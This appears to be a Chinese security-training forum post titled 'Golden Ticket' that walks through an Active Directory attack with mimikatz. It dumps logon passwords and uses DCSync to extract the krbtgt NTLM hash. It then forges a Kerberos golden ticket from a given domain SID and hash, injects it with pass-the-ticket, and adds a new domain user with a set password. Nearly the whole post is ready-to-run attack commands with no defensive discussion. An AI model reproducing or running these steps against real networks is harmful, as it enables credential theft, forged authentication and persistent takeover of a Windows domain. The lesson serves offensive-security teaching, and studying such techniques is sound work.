九,黄金票据-女黑客-必火安全学院

女黑客

 找回密码
 立即注册

QQ登录

只需一步,快速开始

九,黄金票据

[复制链接]
发表于 2023-7-27 17:19:20 | 显示全部楼层 |阅读模式
管理员权限执行:
mimikatz.exe

privilege::debug
sekurlsa::logonpasswords
lsadump::dcsync /domain:bihuo.cn /user:krbtgt

fakename.png



创建黄金票据

1.域名bihuo.cn
2.域的sid号 S-1-5-21-2244602263-1259606959-4127206907-500
3.域的krbtgt ntlmhash值6a4c71ef895a18483f0f03fd3fafd681

4.伪造的用户名

kerberos::golden /domain:bihuo.cn /sid:S-1-5-21-2244602263-1259606959-4127206907-500 /krbtgt:6a4c71ef895a18483f0f03fd3fafd681 /admin:Administrator /ticket:bihuo.kirbi
fakename.png

klist purge 清空凭据
kerberos::ptt C:\Users\bihuo\Desktop\mimikatz\x64\bihuo.kirbi
net user bihuo17_new 123456abcY /add /domain

参考文章:
https://blog.csdn.net/Canterlot/article/details/126694935
https://blog.csdn.net/qq_50854790/article/details/123150372
https://blog.csdn.net/weixin_40412037/article/details/113348310





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|小黑屋|女黑客 |网站地图

© Copyright 2021 版权所有(一极教育科技有限公司)

津ICP备17008032号-3
快速回复 返回顶部 返回列表